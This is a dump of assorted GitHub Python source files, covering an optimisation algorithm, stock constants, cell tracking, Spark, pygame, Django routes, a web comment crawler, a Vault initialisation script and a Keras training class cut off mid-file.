1):\r\n return (1/(1+val))\r\n else:\r\n return val\r\n\r\ndef evaluate(pop,min_max):\r\n vals = []\r\n for cont in pop:\r\n vals.extend([func1(cont,min_max)])\r\n return vals\r\n\r\n \r\n\r\ndef ranking(eval_val,n_imp):\r\n top = []\r\n ac_max = max(eval_val)\r\n for i in range(n_imp+1):\r\n max_v = ac_max\r\n curr_ind = 0\r\n for j in range(len(eval_val)):\r\n if (j in top):\r\n continue\r\n else:\r\n if (eval_val[j]<max_v):\r\n curr_ind = j\r\n max_v = eval_val[j]\r\n top.extend([curr_ind])\r\n return top\r\n\r\n \r\ndef n_cost(eval_val,n_imp,top):\r\n cost = []\r\n for i in range(n_imp+1):\r\n cost.extend([eval_val[top[i]]])\r\n max1 = max(cost)\r\n new_cost = []\r\n for i in range(n_imp+1):\r\n new_cost.extend([abs(eval_val[top[i]]-max1)])\r\n prob = []\r\n sum1 = sum(new_cost)\r\n for i in range(n_imp):\r\n if (i==0):\r\n prob.extend([(new_cost[i])/sum1])\r\n else:\r\n prob.extend([((new_cost[i])/sum1)+prob[i-1]])\r\n return prob\r\n\r\n\r\ndef col_div(prob,top,n_pop,n_imp):\r\n col = []\r\n for i in range (n_pop):\r\n if (i in top):\r\n col.extend([i])\r\n else:\r\n rand = random.random()\r\n for j in range(n_imp):\r\n if (rand<prob[j]):\r\n col.extend([top[j]])\r\n break\r\n \r\n col_sort = []\r\n for i in top:\r\n new_emp = []\r\n for j in range(n_pop):\r\n if (j in top):\r\n continue\r\n else:\r\n if (col[j]==i):\r\n new_emp.extend([j])\r\n col_sort.append(new_emp)\r\n return col_sort\r\n\r\ndef update_emp(pop,n_var,n_imp,beta,col_emp,imp,min_max,rang):\r\n i = 0\r\n for col in col_emp:\r\n k=0\r\n new_imp_ind = imp[i]\r\n temp = k\r\n for cont in col:\r\n new_cont = []\r\n j=0\r\n for var in pop[cont]:\r\n t_val = (var + random.random()*beta*(pop[imp[i]][j]-var))\r\n if (t_val>rang[j][1]):\r\n t_val = rang[j][1]\r\n if (t_val<rang[j][0]):\r\n t_val = rang[j][0]\r\n new_cont.extend([t_val])\r\n j+=1\r\n pop[cont] = new_cont\r\n if(func1(pop[cont],min_max) < func1(pop[new_imp_ind],min_max)):\r\n new_imp_ind = cont\r\n temp = k\r\n k += 1\r\n if (new_imp_ind != imp[i]):\r\n temp1 = imp[i]\r\n imp[i] = new_imp_ind\r\n col[temp] = temp1\r\n i += 1\r\n \r\n return pop\r\n \r\ndef cost_emp(pop,imp,col_emp,eta,min_max):\r\n i=0\r\n t_cost = []\r\n for col in col_emp:\r\n cost_col =0\r\n for cont in col:\r\n cost_col += func1(pop[cont],min_max)\r\n t_cost.extend([func1(pop[imp[i]],min_max) + eta*cost_col])\r\n i += 1\r\n \r\n return t_cost\r\n\r\n\r\ndef pro_emp(t_cost,n_imp):\r\n max1 = max(t_cost)\r\n new_cost = []\r\n for c in t_cost:\r\n new_cost.extend([abs(c - max1)])\r\n \r\n sum1 = sum(new_cost)\r\n prob = []\r\n \r\n for i in range(n_imp):\r\n if (i==0):\r\n prob.extend([(new_cost[i])/sum1])\r\n else:\r\n prob.extend([((new_cost[i])/sum1)+prob[i-1]])\r\n \r\n return prob\r\n\r\n\r\n# Initial variables\r\n\r\nmax_iter = 1000\r\nN_pop = 50\r\nN_imp = 5\r\nN_var = 2\r\nbeta = 1.5\r\neta = 0.1\r\nmin_max = 0\r\n\r\nvar_range = init_range(N_var)\r\nemp_pop = init_pop(N_var,N_pop,var_range)\r\n\r\nvals = evaluate(emp_pop,min_max)\r\n\r\nimps = ranking(vals,N_imp)\r\n\r\nimp_pro = n_cost(vals, N_imp, imps)\r\n\r\ndel imps[-1]\r\n\r\ncolonies = col_div(imp_pro,imps,N_pop, N_imp)\r\n\r\n\r\nw_emp = 0\r\nb_emp = 0\r\n\r\nfor it in range(max_iter):\r\n if(N_imp == 1):\r\n break\r\n emp_pop = update_emp(emp_pop, N_var, N_imp, beta, colonies, imps, min_max, var_range)\r\n cost_emps = cost_emp(emp_pop, imps, colonies, eta, min_max)\r\n t1 = max(cost_emps)\r\n t2 = min(cost_emps)\r\n c2 = 0\r\n for c1 in cost_emps:\r\n if t1 == c1:\r\n w_emp = c2\r\n if t2 == c1:\r\n b_emp = c2\r\n c2 += 1\r\n \r\n pros_emps = pro_emp(cost_emps,N_imp)\r\n del1 = 0\r\n \r\n if (len(colonies[w_emp])==1):\r\n temp_cont = colonies[w_emp][0]\r\n colonies.pop(w_emp)\r\n del1 = 1\r\n \r\n else: \r\n #print(\"w_emp = \",w_emp)\r\n lst_cont = func1(emp_pop[colonies[w_emp][0]], min_max)\r\n l_ind = 0\r\n d_ind = 0\r\n for col in colonies[w_emp]:\r\n if (lst_cont > func1(emp_pop[col], min_max)):\r\n l_ind = d_ind\r\n lst_cont = func1(emp_pop[col], min_max)\r\n d_ind += 1\r\n \r\n temp_cont = colonies[w_emp][l_ind]\r\n colonies[w_emp].pop(l_ind)\r\n \r\n \r\n rand1 = random.random()\r\n \r\n p_ind = 0\r\n for p in pros_emps:\r\n if (rand1<p):\r\n colonies[p_ind].extend([temp_cont])\r\n break\r\n p_ind += 1\r\n \r\n if (del1 == 1):\r\n N_imp -= 1\r\n temp_cont = imps[w_emp]\r\n imps.pop(w_emp)\r\n p_ind = 0\r\n for p in pros_emps:\r\n if (rand1<p):\r\n colonies[p_ind].extend([temp_cont])\r\n break\r\n p_ind += 1\r\n #print(pros_emps)\r\n\r\nprint(emp_pop[imps[b_emp]])\r\nprint(func1(emp_pop[imps[b_emp]],min_max))\r\n\r\n","repo_name":"Wrekkers/Evo_Optimiztion","sub_path":"Optimized_Algo.py","file_name":"Optimized_Algo.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36879914729","text":"# -*- coding: utf-8 -*-\n\n'''\n交易所相关\n以 EXCHANGE_ 为前缀\n'''\n\n# 上海交易所\nEXCHANGE_SHANGHAI = 'XSHG'\n# 深圳交易所\nEXCHANGE_SHENZHEN = 'XSHE'\n\n# 开市\nEXCHANGE_OPNE = 1\n# 休市\nEXCHANGE_CLOSE = 0\n\n# 市场周期\n# 周末, 月末, 年末\nEXCHANGE_WEEKEND = EXCHANGE_MONTHEND = EXCHANGE_YEAREND = 1\n# 非周末, 月末, 年末\nEXCHANGE_NO_END = 0\n\n# A股\nEXCHANGE_STOCK_TYPE_A = 1\n# B股\nEXCHANGE_STOCK_TYPE_B = 2\n\n# 所属板块\n# 主板\nEXCHANGE_BOARD_MAIN = 1\n# 创业板\nEXCHANGE_BOARD_GEM = 2\n# 中小板\nEXCHANGE_BOARD_SMSE = 3\n\n\n# 股票状态\n# 正常交易\nEXCHANGE_STOCK_STATUS_NORMAL = 1\n# 停牌\nEXCHANGE_STOCK_STATUS_STOP = -1\n\n","repo_name":"esonger/stock","sub_path":"p_stock/global_var/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7660147496","text":"import numpy as np\nfrom munkres import Munkres\nfrom scipy.spatial.distance import directed_hausdorff\n\nfrom ..tools.tools import printfancy\n\n\ndef greedy_tracking(TLabels, TCenters, xyresolution, zresolution, track_args):\n dist_th = track_args[\"dist_th\"]\n z_th = track_args[\"z_th\"]\n\n z_th_units = int(np.rint(z_th / zresolution))\n FinalLabels = []\n FinalCenters = []\n label_correspondance = []\n # for each time track to the previous one\n for t in range(len(TLabels)):\n label_correspondance.append([])\n # if the first time, labels remain the same\n if t == 0:\n FinalLabels.append(TLabels[0])\n FinalCenters.append(TCenters[0])\n labmax = np.max(FinalLabels[0])\n for lab in TLabels[0]:\n label_correspondance[0].append([lab, lab])\n continue\n\n # if not first time, we need to fill the correspondance\n FinalLabels.append([])\n FinalCenters.append([])\n # pre-allocate distance matrix of shape [labs at t-1, labs at t]\n Dists = np.ones((len(FinalLabels[t - 1]), len(TLabels[t])))\n\n # for each label at t-1\n for i in range(len(FinalLabels[t - 1])):\n # position of ith cell at t-1\n poscell1 = np.array(FinalCenters[t - 1][i][1:]) * np.array(\n [xyresolution, xyresolution]\n )\n\n # for each cell at t\n for j in range(len(TLabels[t])):\n # position of jth cell at t\n poscell2 = np.array(TCenters[t][j][1:]) * np.array(\n [xyresolution, xyresolution]\n )\n\n # compute distance between the two\n Dists[i, j] = np.linalg.norm(poscell1 - poscell2)\n\n # check if cell cell centers are separated by more than z_th slices\n zdisp = np.abs(FinalCenters[t - 1][i][0] - TCenters[t][j][0])\n zdisp_units = int(np.rint(zdisp / zresolution))\n\n if zdisp_units > z_th_units:\n # if so, set the distance to a large number (e.g. 100)\n Dists[i, j] = 100.0\n\n # for each future cell, which is their closest past one\n a = np.argmin(Dists, axis=0) # max prob for each future cell to be a past cell\n\n # for each past cell, which is their closest future one\n b = np.argmin(Dists, axis=1) # max prob for each past cell to be a future one\n\n correspondance = []\n notcorrespondenta = []\n notcorrespondentb = []\n\n # for each past cell\n for i, j in enumerate(b):\n # j is the index of the closest future cell to cell i\n # check if the closes cell to j cell is i\n if i == a[j]:\n # check if their distance is below a th\n if Dists[i, j] < dist_th:\n # save correspondance and final label\n correspondance.append([i, j]) # [past, future]\n label_correspondance[t].append(\n [TLabels[t][j], FinalLabels[t - 1][i]]\n )\n FinalLabels[t].append(FinalLabels[t - 1][i])\n FinalCenters[t].append(TCenters[t][j])\n\n else:\n # if there was no correspondance, save that\n notcorrespondenta.append(i)\n\n # update max label\n labmax = np.maximum(np.max(FinalLabels[t - 1]), labmax)\n\n # for each future cell\n for j in range(len(a)):\n # check if the future cell is in the correspondance\n if j not in np.array(correspondance)[:, 1]:\n # if not, save it as a new label\n label_correspondance[t].append([TLabels[t][j], labmax + 1])\n FinalLabels[t].append(labmax + 1)\n FinalCenters[t].append(TCenters[t][j])\n labmax += 1\n notcorrespondentb.append(j)\n\n return FinalLabels, label_correspondance\n\n\ndef hungarian_tracking(\n TLabels, TCenters, TOutlines, TMasks, xyresolution, zresolution, track_args\n):\n z_th = track_args[\"z_th\"]\n z_th_units = int(np.rint(z_th / zresolution))\n\n cost_attributes = track_args[\"cost_attributes\"]\n cost_ratios = track_args[\"cost_ratios\"]\n\n cost_dict = dict(zip(cost_attributes, cost_ratios))\n\n FinalLabels = []\n label_correspondance = []\n\n FinalLabels.append(TLabels[0])\n lc = [[l, l] for l in TLabels[0]]\n label_correspondance.append(lc)\n\n labmax = 0\n for t in range(1, len(TLabels)):\n FinalLabels_t = []\n label_correspondance_t = []\n\n labs1 = TLabels[t - 1]\n labs2 = TLabels[t]\n\n pos1 = TCenters[t - 1]\n pos2 = TCenters[t]\n\n masks1 = TMasks[t - 1]\n masks2 = TMasks[t]\n\n outs1 = TOutlines[t - 1]\n outs2 = TOutlines[t]\n\n cost_matrix = []\n for i in range(len(labs1)):\n row = []\n for j in range(len(labs2)):\n zdisp = np.abs(pos1[i][0] - pos2[j][0])\n zdisp_units = int(np.rint(zdisp / zresolution))\n\n if zdisp_units > z_th_units:\n distance = 100.0\n else:\n distance = (\n (pos1[i][1] - pos2[j][1]) ** 2 + (pos1[i][2] - pos2[j][2]) ** 2\n ) ** 0.5\n distance *= xyresolution\n\n vol1 = len(masks1[i])\n vol2 = len(masks2[j])\n volume_diff = abs(vol1 - vol2)\n shape_diff = directed_hausdorff(outs1[i], outs2[j])[\n 0\n ] # Hausdorff distance\n cost = 0\n if \"distance\" in cost_attributes:\n cost += distance * cost_dict[\"distance\"]\n if \"volume\" in cost_attributes:\n cost += volume_diff * cost_dict[\"volume\"]\n if \"shape\" in cost_attributes:\n cost += shape_diff * cost_dict[\"shape\"]\n row.append(cost)\n\n cost_matrix.append(row)\n\n # Create an instance of the Munkres class\n m = Munkres()\n\n # Solve the assignment problem using the Hungarian algorithm\n try:\n indexes = m.compute(cost_matrix)\n except IndexError:\n indexes = []\n\n # Print the matched cell pairs\n for row, column in indexes:\n label1 = labs1[row]\n # get the updated corresponding label\n label1idx = np.where(np.array(label_correspondance[t - 1])[:, 0] == label1)[\n 0\n ][0]\n\n label1 = np.array(label_correspondance[t - 1])[:, 1][label1idx]\n\n label2 = labs2[column]\n label_correspondance_t.append([label2, label1])\n FinalLabels_t.append(label1)\n\n if len(FinalLabels[t - 1]) != 0:\n labmax = np.maximum(np.max(FinalLabels[t - 1]), labmax)\n for lab in labs2:\n if lab not in np.array(label_correspondance_t)[:, 0]:\n labmax += 1\n label_correspondance_t.append([lab, labmax])\n FinalLabels_t.append(labmax)\n FinalLabels.append(FinalLabels_t)\n label_correspondance.append(label_correspondance_t)\n\n return FinalLabels, label_correspondance\n\n\n\"\"\"\nchecks necessary arguments.\n\"\"\"\n\n\ndef check_tracking_args(tracking_arguments, available_tracking=[\"greedy\", \"hungarian\"]):\n if \"method\" not in tracking_arguments.keys():\n printfancy(\"No tracking method provided. Using greedy algorithm\")\n printfancy()\n tracking_arguments[\"method\"] = \"greedy\"\n\n if \"time_step\" not in tracking_arguments.keys():\n printfancy(\"No time step provided, using 1 minute.\")\n printfancy()\n tracking_arguments[\"time_step\"] = 1\n\n if tracking_arguments[\"method\"] not in available_tracking:\n raise Exception(\"invalid segmentation method\")\n return\n\n\n\"\"\"\nfills rest of arguments\n\"\"\"\n\n\ndef fill_tracking_args(tracking_arguments):\n tracking_method = tracking_arguments[\"method\"]\n\n if tracking_method == \"hungarian\":\n new_tracking_arguments = {\n \"time_step\": 1,\n \"method\": \"hungarian\",\n \"z_th\": 2,\n \"cost_attributes\": [\"distance\", \"volume\", \"shape\"],\n \"cost_ratios\": [0.6, 0.2, 0.2],\n }\n\n elif tracking_method == \"greedy\":\n new_tracking_arguments = {\n \"time_step\": 1,\n \"method\": \"greedy\",\n \"dist_th\": 7.5,\n \"z_th\": 2,\n }\n\n for targ in tracking_arguments.keys():\n try:\n new_tracking_arguments[targ] = tracking_arguments[targ]\n except KeyError:\n raise Exception(\n \"key %s is not a correct argument for the selected tracking method\"\n % targ\n )\n\n return new_tracking_arguments\n","repo_name":"dsb-lab/embdevtools","sub_path":"src/embdevtools/celltrack/core/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39603902982","text":"from pyspark import SparkContext\r\n\r\ndef main():\r\n sc = SparkContext(appName='SparkVisibility')\r\n\r\n input_file = sc.textFile('/user/hadoop/input_project_q2/*-99999-*')\r\n station_vdist = input_file.filter(lambda line: line[78:84] != '999999' and line[84:85] in ['0','1','4','5','9']) \\\r\n .map(lambda line: (line[4:10], (int(line[78:84]), 1))) \\\r\n .reduceByKey(lambda a, b: (a[0]+b[0], a[1]+b[1])) \\\r\n .map(lambda x: (x[0], x[1][0]/x[1][1]))\r\n station_vdist.saveAsTextFile('/user/hadoop/outputdata/output_project_q2.txt')\r\n\r\n sc.stop()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"madhu-0912/My_workspace","sub_path":"Projects/Big_data/Spark_Q2/Spark_q2.py","file_name":"Spark_q2.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8016125960","text":"from constants import *\n\n\nclass Camera:\n # зададим начальный сдвиг камеры\n def __init__(self, t, level_width, level_height):\n self.level_height = level_height\n self.level_width = level_width\n self.dx = 0\n self.dy = 0\n self.t = t\n\n # сдвинуть объект obj на смещение камеры\n def apply(self, obj):\n\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n # позиционировать камеру на объекте target\n def update(self, target):\n self.dx = -(target.rect.x + target.rect.w // 2 - WIDTH // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - HEIGHT // 2)\n if self.t.rect.x + self.dx > 0:\n self.dx = -1 * self.t.rect.x\n elif abs(self.t.rect.x + self.dx) + WIDTH > self.level_width:\n self.dx = abs(self.t.rect.x) + WIDTH - self.level_width\n if abs(self.t.rect.y + self.dy) + HEIGHT > self.level_height - 1:\n self.dy = abs(self.t.rect.y) + HEIGHT - self.level_height\n elif self.t.rect.y + self.dy > 0:\n self.dy = -self.t.rect.y\n","repo_name":"VinGP/pygameProject","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24343904137","text":"from django.urls import path\nfrom . import views as service_views\nfrom django.contrib.auth import views as auth_views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('all-services/', service_views.view_all_services, name='services-all'),\n path('services/<str:type>', service_views.view_services, name='services'),\n path('single-service/<int:service_id>', service_views.view_single_service, name='services-single'),\n path('ajax/load-timeslots/<int:service_id>', service_views.load_timeslots, name='ajax_load_time'),\n path('booking_confirmation/<int:service_id>/<int:booking_id>', service_views.booking_confirmation, name='services-booking-confirmation'),\n path('sitter_confirmation/<int:service_id>/<int:booking_id>/<int:sitter_answer>', service_views.sitter_confirmation, name='services-sitter-confirmation'),\n path('owner_payment/<int:booking_id>', service_views.owner_payment, name='services-owner-payment'),\n path('view_miisitter_profile/<int:sitter_id>/', service_views.view_sitter_profile, name='services-view-miisitter'),\n path('view_miiowner_profile/<int:owner_id>/', service_views.view_owner_profile, name='services-view-miiowner'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","repo_name":"MiiPets/webapp","sub_path":"MiipetsWebApp/services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31119715552","text":"from rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom apps.taskapp.celery import celery_app\n\n\nclass TaskViewApi(APIView):\n def get(self, request: Request, task_id):\n task = celery_app.AsyncResult(task_id)\n response_data = {\n 'task_id': task.id,\n 'task_status': task.status\n }\n\n if task.status == 'SUCCESS':\n response_data['result'] = 'Your pizza is ready'\n\n return Response(data=response_data)\n","repo_name":"Jiklopo/biometric-task","sub_path":"apps/taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7981484242","text":"# coding=utf-8\n\n##############################################################################################\n# @file:zonghengBookComments.py\n# @author:QW_Liang\n# @date:2017/9/16\n# @version:Ver0.0.0.100\n# @note:纵横图书获取评论的文件\n###############################################################################################\nimport time\nimport math\nfrom storage.cmtstorage import CMTStorage\nfrom storage.newsstorage import NewsStorage\nfrom utility.xpathutil import XPathUtility\nfrom website.common.comments import SiteComments\nfrom log.spiderlog import Logger\nfrom utility.gettimeutil import getuniformtime\nfrom utility.timeutility import TimeUtility\n\n##############################################################################################\n# @class:PubComments\n# @author:QW_Liang\n# @date:2017/9/16\n# @note:纵横图书获取评论的类,继承于SiteComments类\n##############################################################################################\nclass PubComments(SiteComments):\n # 分支条件\n STEP_2 = '2_pub'\n STEP_3 = '3_pub'\n PAGE_SIZE = 30.0\n # COMMENTS_URL = 'http://pub.zongheng.com/ajax/book.comment.getThreadL1st.do?bookId={bookId}&pageNum={pageno}'\n COMMENTS_URL = 'http://pub.zongheng.com/ajax/book.comment.getThreadL1st.do'\n ##############################################################################################\n # @functions:__init__\n # @return:none\n # @author:Ninghz\n # @date:2016/12/06\n # @note:PubComments类的构造器,初始化内部变量\n ##############################################################################################\n def __init__(self, parent):\n SiteComments.__init__(self)\n self.website = parent.website\n\n ##############################################################################################\n # @functions:getcomments_step1\n # @param:共通模块传入的参数(对象url, 原始url, 当前step数,自定义参数)\n # @return:无\n # @author:Ninghz\n # @date:2016/12/06\n # @note:根据输入url,拼出获取评论页数的url\n ##############################################################################################\n def getcomments_step1(self, params):\n bookId = int(self.r.parse('^http://pub\\.zongheng\\.com/book/(\\d+).html$', params.url)[0])\n Logger.getlogging().debug(bookId)\n # commentinfo_url = PubComments.COMMENTS_URL.format(bookId=bookId, pageno=1)\n commentinfo_url = PubComments.COMMENTS_URL\n self.storeposturl(commentinfo_url, params.originalurl, PubComments.STEP_2,{'bookId': bookId,'pageNum':'1'},{'bookId': bookId})\n\n ##############################################################################################\n # @functions:getcomments_step2\n # @param:共通模块传入的参数(对象url, 原始url, 当前step数,自定义参数)\n # @return:无\n # @author:Ninghz\n # @date:2016/12/6\n # @note:根据输入html,拼出获取所有评论的url\n ##############################################################################################\n def getcomments_step2(self, params):\n bookId = params.customized['bookId']\n xhtml = XPathUtility(html=params.content)\n page_counts = int(xhtml.xpath('//div[@class=\"page\"]/@pagenum')[0])\n comments_count = int(xhtml.xpath('//div[@class=\"page\"]/@total')[0])\n Logger.getlogging().debug(comments_count)\n if page_counts == 0:\n return\n # 判断增量\n cmtnum = CMTStorage.getcount(params.originalurl, True)\n if cmtnum >= comments_count:\n return\n\n page_num = int(math.ceil(float(comments_count - cmtnum)/self.PAGE_SIZE))\n if page_num >= self.maxpages:\n page_num = self.maxpages\n NewsStorage.setcmtnum(params.originalurl, comments_count)\n\n for page in range(1, page_num+1, 1):\n comment_url = PubComments.COMMENTS_URL\n self.storeposturl(comment_url, params.originalurl, PubComments.STEP_3,{'bookId': bookId,'pageNum':page})\n\n ##############################################################################################\n # @functions:getcomments_step3\n # @param:共通模块传入的参数(对象url, 原始url, 当前step数,自定义参数)\n # @return:无\n # @author:QW_Liang\n # @date:2017/9/16\n # @note:根据输入html,得到评论\n ##############################################################################################\n def getcomments_step3(self, params):\n xhtml = XPathUtility(html=params.content)\n contents = xhtml.getlist('//*[@class=\"wz\"]/p')\n curtimes = xhtml.getlist('//*[@class=\"fr\"]')\n nicks = xhtml.getlist('//*[@class=\"wzbox\"]/h5')\n\n for index in range(0, len(contents), 1):\n curtime = curtimes[index][4:]+':00'\n Logger.getlogging().debug(contents[index])\n content = str(contents[index])\n nick = str(nicks[index])\n if not CMTStorage.exist(params.originalurl, content, curtime, nick):\n CMTStorage.storecmt(params.originalurl, content, curtime, nick)","repo_name":"ErBingBing/django-tonado-crawler","sub_path":"ZG-PhaseFour/code/website/zongheng/zonghengPubComments.py","file_name":"zonghengPubComments.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31099634700","text":"# -*- coding: utf-8 -*-\n\n# A stripe follows the red vertex through the dotted red edges,\n# each red vertex has a triangle. Two adjacent triangles\n# (sharing two black vertex) are related by the red edge.\n# This forms a dual-graph.\n# We know the number of red vertices (it's the same as num of\n# triangles) and the triangles black vertices. We must check\n# if two of the black vertices are in the dual-graph,\n# if they are, then add an edge between that triangle/red-vertex\n# and the new triangle/red-vertex, we add 3 edges at most (since\n# there are at most 3 adjacent triangles)\n\n# We must avoid checking each red vertex each time\n# we add a new triangle, otherwise the time is quadratic\n# in the number of triangles/red-vertices\n\n\nfrom collections import defaultdict\n\n\n# runtime O(n) in the number of triangles/red-vertices\n\n\nclass RedVertex:\n def __init__(self, label, triangle):\n self.label = label\n self.triangle = triangle\n\n def __repr__(self):\n return 'RedVertex<label(%r); triangle(%r)>' % (self.label, self.triangle)\n\n\nclass Graph:\n def __init__(self):\n self.vertices = []\n self.edges = defaultdict(lambda: [])\n self.triangles = {}\n self.fragments = {} # extra O(3m) (num of triangles) space\n\n def _create_red_vertex(self, triangle):\n v = RedVertex(\n label=len(self.vertices) + 1,\n triangle=triangle)\n self.vertices.append(v)\n return v.label\n\n def insert_edge(self, x, y, directed=False):\n self.edges[x].append(y)\n if not directed:\n self.insert_edge(y, x, directed=True)\n\n # self.fragments[pair] at any given time\n # may have nothing, a triangle/red-vertex, or\n # the next triangle/red-vertex in the strip\n def insert(self, triangle):\n v = self._create_red_vertex(triangle)\n a, b, c = sorted(triangle) # O(3log3) is a constant\n # Make sure *each* pair is in asc order \"a < b < c\"\n for pair in ((a, b), (b, c), (a, c)):\n if pair in self.fragments:\n assert len(self.edges[v]) < 3, (\n 'Triangle connections maxed-out (max is 3)')\n assert v != self.fragments[pair], (\n 'Duplicated or overlapped triangle')\n self.insert_edge(v, self.fragments[pair])\n else:\n self.fragments[pair] = v\n\n\ntriangles = [\n (0, 1, 3), # next to prev and next\n (1, 2, 3), # next to prev and next\n (2, 3, 4), # next to prev and next\n (3, 4, 5), # next to prev\n\n (0, 3, 6), # next to 0\n (0, 1, 7) # next to 0\n]\n\ng = Graph()\nfor triangle in triangles:\n g.insert(triangle)\n\nprint(dict(g.edges))\n# {0: [1, 4, 5], 1: [0, 2], 2: [1, 3], 3: [2], 4: [0], 5: [0]}\nprint(len(g.vertices))\n\nassert len(g.edges) == len(triangles)\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_11_stripe_of_triangles.py","file_name":"05_11_stripe_of_triangles.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19066530334","text":"import logging\nimport os\n\nfrom alembic import command\nfrom alembic.config import Config\n\nlogger = logging.getLogger(__name__)\n\n\ndef run_db_migrations(config, dsn: str, script_location: str) -> None:\n logger.info(f'Running DB migrations in {script_location}')\n original_wd = os.getcwd()\n os.chdir(script_location)\n alembic_cfg = Config(config)\n alembic_cfg.attributes['configure_logger'] = False\n alembic_cfg.set_main_option('sqlalchemy.url', dsn)\n command.upgrade(alembic_cfg, 'head')\n os.chdir(original_wd)\n","repo_name":"kamikaze/fastapi-project-template","sub_path":"src/fastapi_project_template/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14194429298","text":"def skew(String):\n\tmatrix = {}\n\tskew = 0\n\tindex = 0\n\tmatrix[index] = skew\n\tfor base in String:\n\t\tindex = index + 1\n\t\tif base == \"G\":\n\t\t\tskew = skew + 1\n\t\t\tmatrix[index] = skew\n\t\telif base == \"C\":\n\t\t\tskew = skew - 1\n\t\t\tmatrix[index] = skew\n\t\telse:\n\t\t\tskew = skew + 0\n\t\t\tmatrix[index] = skew\n\treturn matrix\n\ndef minimum(matrix):\n\tminimum_value = min(matrix.values())\n\tpotential_ori = []\n\tfor index,value in matrix.items():\n\t\tif value == minimum_value:\n\t\t\tpotential_ori.append(index)\n\treturn potential_ori\n\n\ndef maximum(matrix):\n\tmaximum_value = max(matrix.values())\n\tpotential_ori = []\n\tfor index,value in matrix.items():\n\t\tif value == maximum_value:\n\t\t\tpotential_ori.append(index)\n\treturn potential_ori\n\n\nwith open(\"dataset_7_10.txt\",\"r\") as file:\n\tString = file.read()\n\ncompute = skew(String)\n\n\npotential_ori = maximum(compute)\n\n\nprint(*potential_ori, sep=\" \")\n","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"skew.py","file_name":"skew.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25015591","text":"#!/usr/local/bin/python3\nimport requests\nimport pdb\n\n\ndef vaultinit():\n url = 'http://127.0.0.1:8200/v1'\n payload = {'secret_shares': 1, 'secret_threshold': 1}\n initstat = requests.get('{}/sys/init'.format(url))\n #Is Vault already initalized?\n if initstat.json()['initialized'] == True:\n return \"Already initialized\"\n initreq = requests.put('{}/sys/init'.format(url), json=payload)\n unsealreq = requests.put('{}/sys/unseal'.format(url), json={'key': initreq.json()['keys_base64'][0]})\n default_token= requests.post('{}/auth/token/create'.format(url), headers={\"X-Vault-Token\": initreq.json()['root_token']}, json={\"no_default_policy\": \"true\"})\n #Write client token to a file so it can be accessed elsewhere\n with open(\"supersecrets\", \"w\") as out:\n out.write(default_token.json()['auth']['client_token'])\n\n\nif __name__ == '__main__':\n vaultinit()\n","repo_name":"schristoff/pyvault","sub_path":"vaultinit.py","file_name":"vaultinit.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28905845513","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 00:03:15 2020\n\n@author: wyckliffe\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom skimage import io\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.models import Sequential, Model\nfrom keras.applications.vgg16 import VGG16\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, EarlyStopping, ReduceLROnPlateau\n\nclass Tune:\n\n def __init__(self) :\n\n train_df = pd.read_csv('train.csv')\n valid_df = pd.read_csv('test.csv')\n\n image_size = (224, 224)\n\n train_idg = ImageDataGenerator(rescale=1. / 255.0,\n horizontal_flip = True,\n vertical_flip = False,\n height_shift_range= 0.1,\n width_shift_range=0.1,\n rotation_range=20,\n shear_range = 0.1,\n zoom_range=0.1)\n\n self.train_gen = train_idg.flow_from_dataframe(dataframe=train_df,\n directory=None,\n x_col = 'img_path',\n y_col = 'class',\n class_mode = 'binary',\n target_size = image_size,\n batch_size = 9\n )\n\n val_idg = ImageDataGenerator(rescale=1. / 255.0\n )\n\n val_gen = val_idg.flow_from_dataframe(dataframe=valid_df,\n directory=None,\n x_col = 'img_path',\n y_col = 